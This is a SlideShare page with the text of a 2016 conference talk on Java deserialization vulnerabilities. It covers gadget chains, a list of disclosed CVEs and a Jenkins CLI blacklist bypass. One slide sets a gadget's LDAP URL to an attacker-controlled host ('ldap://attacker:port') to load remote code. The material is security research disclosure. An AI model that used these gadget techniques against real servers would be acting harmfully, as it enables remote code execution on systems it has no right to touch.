SlideShare a Scribd company logo

Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)

â€ĸ
â€ĸ
CODE WHITE GmbH
CODE WHITE GmbH

Slides from my DeepSec 2016 talk

Software
1 of 57
Download to read offline
Java Deserialization Vulnerabilities – The Forgotten Bug Class Matthias Kaiser (@matthias_kaiser)
About me ī‚§ Head of Vulnerability Research at Code White in Ulm, Germany ī‚§ Dev for defense company in the past ī‚§ Spent a lot of time on (server-side) Java Security ī‚§ Found bugs in products of Oracle, VMware, IBM, SAP, Symantec, Apache, Adobe, HP, etc. ī‚§ Recently looking more into the Windows world and client-side stuff @matthias_kaiser 11.11.2016 2
Agenda ī‚§ Introduction ī‚§ Java’s Object Serialization ī‚§ What’s the problem with it ī‚§ A history of bugs ī‚§ Finding and exploiting ī‚§ Code White’s bug parade ī‚§ A hands-on example ī‚§ More to come? 11.11.2016 3
Should you care? ī‚§ If your client is running server products of you SHOULD! 11.11.2016 4
Some facts ī‚§ The bug class exists for more than 10 years ī‚§ Most ignored bug class in the server-side Java world until 2015 ī‚§ A easy way to get reliable RCE on a server ī‚§ Architecture independent exploitation ī‚§ With Java deserialization vulnerabilities you can pwn a corp easily! 11.11.2016 5
Where is it used ī‚§ Several J2EE/JEE core technologies rely on serialization ī‚§ Remote Method Invocation (RMI) ī‚§ Java Management Extension (JMX) ī‚§ Java Message Service (JMS) ī‚§ Java Server Faces implementations (ViewState) ī‚§ Communication between JVMs in general (because devs are lazy :-) ī‚§ Custom application protocols running on top of http, etc. 11.11.2016 6
What is serialization? Object File Network Database ObjectStream of bytes Stream of bytes Serialization Deserialization 11.11.2016 7
Overview of Java’s Object Serialization Protocol Magic class name field type class field Class description info TC_OBJECT TC_CLASSDESC classdata[] 11.11.2016 8
There is protocol spec and a grammar https://docs.oracle.com/javase/8/docs/platform/serialization/spec/protocol.html 11.11.2016 9
Deserializing an object What could possibly go wrong here? 11.11.2016 10
What’s the problem ī‚§ ObjectInputStream doesn’t include validation features in its API ī‚§ All serializable classes that the current classloader can locate and load can get deserialized ī‚§ Although a class cast exception might occur in the end, the object will be created! 11.11.2016 11
What’s the problem #2 ī‚§ A developer can customize the (de)-serialization of a serializable class ī‚§ Implement methods writeObject(), writeReplace(), readObject() and readResolve() ī‚§ ObjectInputStream invokes readObject() and readResolve() Under our control! 11.11.2016 12
What’s the problem #3 ī‚§ Further methods can be triggered by using certain classes as a "trampoline" ī‚§ Object.toString() using e.g. javax.management.BadAttributeValueExpException ī‚§ Object.hashCode() using e.g. java.util.HashMap ī‚§ Comparator.compare() using e.g. java.util.PriorityQueue ī‚§ etc. Trampoline class Target class 11.11.2016 13
What’s the problem #3 javax.management.BadAttributeValueExpException 1. Reading the field "val" 2. Calling "toString()" on "val" 11.11.2016 14
History of Java deserialization vulnerabilities JRE vulnerabilities (DoS) Mark SchÃļnefeld 2006 JSF Viewstate XSS/DoS Sun Java Web Console Luca Carretoni 2008 CVE-2011-2894 Spring Framework RCE Wouter Coekaerts CVE-2012-4858 IBM Cognos Business Intelligence RCE Pierre Ernst 2011 2012 11.11.2016 15
History of Java deserialization vulnerabilities CVE-2013-1768 Apache OpenJPA RCE CVE-2013-1777 Apache Geronimo 3 RCE CVE-2013-2186 Apache commons-fileupload RCE Pierre Ernst CVE-2015-3253 Groovy RCE CVE-2015-7501 Commons-Collection RCE Gabriel Lawrence and Chris Frohoff CVE-2013-2165 JBoss RichFaces RCE Takeshi Terada 2013 2015 11.11.2016 16
#JavaDeser is new hotness â€Ļ 11.11.2016 17
Finding is trivial ī‚§ Do the "grep" thing on "readObject()" 11.11.2016 18
Finding is trivial ī‚§ Use an IDE like Intellij or Eclipse and trace the call paths to ObjectInputStream.readObject() 11.11.2016 19
Exploitation ī‚§ Exploitation requires a chain of serialized objects triggering interesting functionality e.g. ī‚§ writing files ī‚§ dynamic method calls using Java’s Reflection API ī‚§ etc. ī‚§ For such a chain the term "gadget" got established ī‚§ Chris Frohoff and others found several gadgets in standard libs 11.11.2016 20
Javassist/Weld Gadget ī‚§ Gadget utilizes JBoss’ Javassist and Weld framework ī‚§ Reported to Oracle with the Weblogic T3 vulnerability ī‚§ Works in Oracle Weblogic and JBoss EAP ī‚§ Allows us to call a method on a deserialized object 11.11.2016 21
"Return of the Rhino"-Gadget ī‚§ Gadget utilizes Rhino Script Engine of Mozilla ī‚§ Works with latest Rhino in the classpath ī‚§ Oracle applied some hardening to its Rhino version ī‚§ So only works Oracle JRE <= jre7u13 īŒ ī‚§ Works with latest openjdk7-JRE (e.g. on Debian, Ubuntu) īŠ ī‚§ Allows us to call a method on a deserialized object ī‚§ JRE Gadget īŠ 11.11.2016 22
What to look for? ī‚§ Look for methods in serializable classes ī‚§ working on files ī‚§ triggering reflection (invoking methods, getting/setting properties on beans) ī‚§ doing native calls ī‚§ etc. AND being called from ī‚§ readObject() ī‚§ readResolve() ī‚§ toString() ī‚§ hashCode() ī‚§ finalize() ī‚§ any other method being called from a "Trampoline" class 11.11.2016 23
What to look for? ī‚§ Look at serializable classes used in Java reflection proxies ī‚§ java.lang.reflect.InvocationHandler implementations ī‚§ javassist.util.proxy.MethodHandler implementations InvocationHandlerInterface Proxy toString() invoke (â€Ļ) // do smth invoke (target, toString, args) 11.11.2016 24
What to look for? Prints out method being called 11.11.2016 25
What to look for? What if InvocationHandler.invoke() does "insecure stuff" using values from the serialized object input stream? Proxy 11.11.2016 26
Making gadget search easier ī‚§ Chris Frohoff released a tool for finding gadgets using a graph database ī‚§ Using object graph queries for gadget search 11.11.2016 27
Exploitation tricks ī‚§ Adam Gowdiak’s TemplatesImpl ī‚§ com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl is serializable ī‚§ Allows to define new classes from your byte[ ][ ] ī‚§ Calling TemplatesImpl.newTransformer() on deserialized object īƒ  Code Execution 11.11.2016 28
Exploitation tricks ī‚§ InitialContext.lookup() ī‚§ @benmmurphy used it for a sandbox escape (CVE-2013-5830) ī‚§ @zerothoughts published a gadget in Spring’s JtaTransactionManager recently ī‚§ Triggers InitialContext.lookup(jndiName) ī‚§ Uses "rmi://yourFakeRmiServer/Object" as jndiName ī‚§ Loads classes from your fake RMI server ī‚§ Calling JdbcRowSetImpl.execute() on a deserialized object will do the same īŠ 11.11.2016 29
Payload generation ī‚§ Chris Frohoff released the great tool "ysoserial" ī‚§ Makes creation of payloads easy ī‚§ Includes gadgets for ī‚§ Commons Collection 3 & 4 ī‚§ Spring ī‚§ Groovy ī‚§ JRE7 (<= jre7u21) ī‚§ Commons BeanUtils ī‚§ and even more! 11.11.2016 30
Custom payloads ī‚§ I wouldn’t go for Runtime.getRuntime().exec(cmd) for several reasons ī‚§ Most of the gadgets don’t touch the disk īŠ ī‚§ With scripting languages your life gets even easier ī‚§ Use what’s in the classpath ī‚§ Javascript (Rhino, Nashorn) ī‚§ Groovy ī‚§ Beanshell ī‚§ etc. 11.11.2016 31
Code White’s Bug Parade #1 ī‚§ CVE-2015-6554 - Symantec Endpoint Protection Manager RCE ī‚§ CVE-2015-6576 - Atlassian Bamboo RCE ī‚§ CVE-2015-7253 - Commvault Edge Server RCE ī‚§ CVE-2015-7253 - Apache ActiveMQ RCE ī‚§ CVE-2015-4582 - Oracle Weblogic RCE ī‚§ CVE-2016-1998 - HP Service Manager RCE ī‚§ CVE-2016-2173 - Spring AMQP RCE ī‚§ CVE-2016-3493 - Oracle Hyperion RCE ī‚§ CVE-2016-3551 - Oracle Weblogic RCE ī‚§ CVE-2016-3551 - Oracle Weblogic RCE 11.11.2016 32
Code White’s Bug Parade #2 ī‚§ NOT-FIXED - IBM WebSphere MQ JMS client RCE ī‚§ NOT-FIXED - IBM WebSphere JMS Client RCE ī‚§ NOT-FIXED - Pivotal RabbitMQ JMS client RCE ī‚§ NOT-FIXED - Oracle OpenMQ JMS client RCE ī‚§ CVE-2016-4978 - Apache ActiveMQ Artemis JMS client RCE ī‚§ CVE-2016-4974 - Apache Qpid client/JMS client RCE ī‚§ CVE-2016-0638 - Oracle Weblogic JMS client RCE ī‚§ FIXED-NO-CVE - IIT Software SwiftMQ JMS client RCE ī‚§ MAYBE-FIX - Amazon SQS Java Messaging RCE ī‚§ WONT-FIX - JBOSS HornetQ JMS client RCE 11.11.2016 33
A hands-on example 11.11.2016 34
Jenkins 11.11.2016 35
Jenkins 11.11.2016 36
Jenkins ī‚§ Open Source Automation Server / Continous Integration Server / "Build"-Server ī‚§ Created by Kohsuke Kawaguchi (Ex-Oracle, now CTO of CloudBees) ī‚§ Fork of Oracle’s Hudson CI server ī‚§ Supports Subversion, Git, Mecurial, etc. ī‚§ Runs Maven, Ant, etc. ī‚§ More than 1200 plugins! (see https://updates.jenkins-ci.org/download/plugins/) 11.11.2016 37
Jenkins ī‚§ Nice target because Jenkins ī‚§ has access to Source Code repositories ī‚§ creates deployment artefacts (Jar, War, Ear, etc.) ī‚§ can deploy artefacts on target servers ī‚§ stores credentials (user/password, SSH keys) 11.11.2016 38
Jenkins Internals ī‚§ Jenkins uses an extra port for the Command Line Interface (CLI) ī‚§ Can be configured to a fixed or random port 11.11.2016 39
Jenkins Internals ī‚§ Jenkins uses an own RMI protocol for it’s Command Line Interface (CLI) ī‚§ Base64-encoded serialized objects (rO0 īƒ 0xac,0xed) 11.11.2016 40
Jenkins under Attack ī‚§ Jenkins CLI endpoint suffered from several vulnerabilities ī‚§ CVE-2015-8103 of Steven Breen using Commons Collections gadget ī‚§ Jenkins introduced a blacklist to filter gadget classes ī‚§ CVE-2016-0788 of Moritz Bechler bypassing the blacklist (see ERNW blog post https://insinuator.net/2016/07/jenkins-remoting-rce-ii-the-return-of-the-ysoserial/) ī‚§ As we all know blacklisting is hard because you never know â€Ļ 11.11.2016 41
Jenkins’ Blacklist 11.11.2016 42
Finding a blacklist filter bypass ī‚§ How to bypass a gadget blacklist filter? a) Find a new gadget b) Find a bypass gadget (see Alvaro’s and Christian’s Research) c) Look for partially fixed gadget ī‚§ After looking at all gadgets of ysoserial and matching them with Jenkin’s third-party libs and the blacklist I found one interesting gadget discovered by Moritz Bechler: 11.11.2016 43
The JSON1 gadget ī‚§ "Code execution step" ī‚§ filtered by blacklist īŒ ī‚§ "Trigger step" ī‚§ invokes all "getter" methods on a serialized object ī‚§ Not filtered by blacklist īŠ ī‚§ "Init step" 11.11.2016 44
Finding a blacklist filter bypass #1 ī‚§ Initial idea was to use the JDBCRowSetImpl trick as code execution step ī‚§ "Getter"-methods trigger JNDI call: ī‚§ But net.sf.json.JSONObject.containsValue(JDBCRowSetImpl-instance) fails because several "Getter"-methods trigger Exceptions īŒ 11.11.2016 45
Finding a blacklist filter bypass #2 ī‚§ Next idea was to look for other serializable classes with "Getter"-Methods leading to code execution ī‚§ Recent research FTW: 11.11.2016 46
Finding a blacklist filter bypass #2 ī‚§ JNDI lookups can lead to RCE (see JDBCRowSetImpl) ī‚§ Exploitation using RMI, LDAP and CORBA ī‚§ LDAP queries can lead to RCE ī‚§ LDAP server needs to be under your control ī‚§ data from LDAPresponse is deserialized using ObjectInputStream ī‚§ data (URLs) from LDAP response is used to load classes using URLClassLoader -> RCE ī‚§ I found some nice classes in package „com.sun.jndi.ldap" ī‚§ One of it is the serializable class "com.sun.jndi.ldap.LdapAttribute" 11.11.2016 47
com.sun.jndi.ldap.LdapAttribute baseCtxURL=ldap://attacker:port rdn="dc=whatever" 11.11.2016 48
Putting all together for the new JSON2 gadget 11.11.2016 49 ī‚§ With LdapAttribute.getAttributeDefinition() we get Code Execution using a custom LDAP server ī‚§ The "Init-Step" shown before doesn’t work, so we need something else īŒ ī‚§ By using Eclipse an alternative code path can be easily found īŠ
Some "updates" with regards to exploitation â€Ļ ī‚§ Previous research only mentioned the CLI port! ī‚§ If you have Jenkins running on the internet with firewall / reverse proxy, you can’t connect ī‚§ But the Jenkins Wiki has some hidden gems for us: Connection mechanism 1. Jenkins CLI clients and Jenkins server establishes the communication in the following fashion. Jenkins listens on a TCP/IP port configured under "TCP port for JNLP agents" in the system configuration page. This single port is used for both agents and CLI. â€Ļ 5. If that fails (for example, if there's a reverse proxy and Jenkins runs on a different host, or if a firewall blocks access to this TCP/IP port), or if the header is not found, it will fall back to the communication mechanism that uses two simultaenous HTTP connections. 11.11.2016 50
Jenkins CLI HTTP "fallback" 11.11.2016 51 ī‚§ HTTP Connection #1 ī‚§ Server īƒ  Client channel ī‚§ Client reads from InputStream ī‚§ UUID as identifier ī‚§ Blocks until #2 connects ī‚§ HTTP Connection #2 ī‚§ Client īƒ  Server channel ī‚§ Client writes to OutputStream ī‚§ UUID as identifier
Jenkins - 2.19.2 LTS DEMO 11.11.2016 52
Jenkins - 2.19.2 LTS 11.11.2016 53
Jenkins - 2.19.2 LTS 11.11.2016 54
Conclusion ī‚§ Java Deserialization is no rocket science ī‚§ Finding bugs is trivial, exploitation takes more ī‚§ So many products affected by it ī‚§ Research has started, again â€Ļ ī‚§ This will never end! 11.11.2016 55
Q&A 11.11.2016 56
Java Deserialization Vulnerabilities – The forgotten bug class Matthias Kaiser

Recommended

OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
Exploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaExploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaCODE WHITE GmbH
 
Java Serialization Deep Dive
Java Serialization Deep DiveJava Serialization Deep Dive
Java Serialization Deep DiveMartijn Dashorst
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...joaomatosf_
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
ä¸ēå•ĨåˆĢč¯ģHotSpot VMįš„æēį īŧˆ2012-03-03īŧ‰
ä¸ēå•ĨåˆĢč¯ģHotSpot VMįš„æēį īŧˆ2012-03-03īŧ‰ä¸ēå•ĨåˆĢč¯ģHotSpot VMįš„æēį īŧˆ2012-03-03īŧ‰
ä¸ēå•ĨåˆĢč¯ģHotSpot VMįš„æēį īŧˆ2012-03-03īŧ‰Kris Mok
 
Black Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized CommunicationBlack Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized Communicationmsaindane
 

Recommended

OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
Exploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaExploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaCODE WHITE GmbH
 
Java Serialization Deep Dive
Java Serialization Deep DiveJava Serialization Deep Dive
Java Serialization Deep DiveMartijn Dashorst
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...joaomatosf_
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
ä¸ēå•ĨåˆĢč¯ģHotSpot VMįš„æēį īŧˆ2012-03-03īŧ‰
ä¸ēå•ĨåˆĢč¯ģHotSpot VMįš„æēį īŧˆ2012-03-03īŧ‰ä¸ēå•ĨåˆĢč¯ģHotSpot VMįš„æēį īŧˆ2012-03-03īŧ‰
ä¸ēå•ĨåˆĢč¯ģHotSpot VMįš„æēį īŧˆ2012-03-03īŧ‰Kris Mok
 
Black Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized CommunicationBlack Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized Communicationmsaindane
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Christian Schneider
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Christian Schneider
 
Insecure Java Deserialization
Insecure Java DeserializationInsecure Java Deserialization
Insecure Java DeserializationShiv Sahni
 
New PHP Exploitation Techniques
New PHP Exploitation TechniquesNew PHP Exploitation Techniques
New PHP Exploitation TechniquesRIPS Technologies GmbH
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesCharles Nutter
 
Wrapper classes
Wrapper classes Wrapper classes
Wrapper classes Kongu Engineering College, Perundurai, Erode
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)CODE WHITE GmbH
 
Attack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationAttack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationSukhpreet Singh
 
Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Salesforce Engineering
 
Intrinsic Methods in HotSpot VM
Intrinsic Methods in HotSpot VMIntrinsic Methods in HotSpot VM
Intrinsic Methods in HotSpot VMKris Mok
 
Spring boot Introduction
Spring boot IntroductionSpring boot Introduction
Spring boot IntroductionJeevesh Pandey
 
Final field semantics
Final field semanticsFinal field semantics
Final field semanticsVladimir Sitnikov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Hibernate Presentation
Hibernate PresentationHibernate Presentation
Hibernate Presentationguest11106b
 
Spring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSpring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSam Brannen
 
JAVA OOP
JAVA OOPJAVA OOP
JAVA OOPSunil OS
 
Spring boot
Spring bootSpring boot
Spring bootsdeeg
 
JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013Vladimir Ivanov
 
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...Moabi.com
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 

More Related Content

What's hot

Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Christian Schneider
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Christian Schneider
 
Insecure Java Deserialization
Insecure Java DeserializationInsecure Java Deserialization
Insecure Java DeserializationShiv Sahni
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesCharles Nutter
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)CODE WHITE GmbH
 
Attack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationAttack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationSukhpreet Singh
 
Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Salesforce Engineering
 
Intrinsic Methods in HotSpot VM
Intrinsic Methods in HotSpot VMIntrinsic Methods in HotSpot VM
Intrinsic Methods in HotSpot VMKris Mok
 
Spring boot Introduction
Spring boot IntroductionSpring boot Introduction
Spring boot IntroductionJeevesh Pandey
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Hibernate Presentation
Hibernate PresentationHibernate Presentation
Hibernate Presentationguest11106b
 
Spring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSpring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSam Brannen
 
JAVA OOP
JAVA OOPJAVA OOP
JAVA OOPSunil OS
 
Spring boot
Spring bootSpring boot
Spring bootsdeeg
 
JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013Vladimir Ivanov
 

What's hot (20)

Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
 
Insecure Java Deserialization
Insecure Java DeserializationInsecure Java Deserialization
Insecure Java Deserialization
 
New PHP Exploitation Techniques
New PHP Exploitation TechniquesNew PHP Exploitation Techniques
New PHP Exploitation Techniques
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for Dummies
 
Wrapper classes
Wrapper classes Wrapper classes
Wrapper classes
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
 
Attack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationAttack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure Deserialization
 
Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess
 
Intrinsic Methods in HotSpot VM
Intrinsic Methods in HotSpot VMIntrinsic Methods in HotSpot VM
Intrinsic Methods in HotSpot VM
 
Spring boot Introduction
Spring boot IntroductionSpring boot Introduction
Spring boot Introduction
 
Final field semantics
Final field semanticsFinal field semantics
Final field semantics
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Hibernate Presentation
Hibernate PresentationHibernate Presentation
Hibernate Presentation
 
Spring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSpring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing Support
 
JAVA OOP
JAVA OOPJAVA OOP
JAVA OOP
 
Spring boot
Spring bootSpring boot
Spring boot
 
JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013
 

Viewers also liked

[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...Moabi.com
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Pentesting iOS Apps - Runtime Analysis and Manipulation
Pentesting iOS Apps - Runtime Analysis and ManipulationPentesting iOS Apps - Runtime Analysis and Manipulation
Pentesting iOS Apps - Runtime Analysis and ManipulationAndreas Kurtz
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
La sezione Riepilogo nel Profilo LinkedIn
La sezione Riepilogo nel Profilo LinkedInLa sezione Riepilogo nel Profilo LinkedIn
La sezione Riepilogo nel Profilo LinkedInLeonardo Bellini
 

Viewers also liked (7)

[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Pentesting iOS Apps - Runtime Analysis and Manipulation
Pentesting iOS Apps - Runtime Analysis and ManipulationPentesting iOS Apps - Runtime Analysis and Manipulation
Pentesting iOS Apps - Runtime Analysis and Manipulation
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
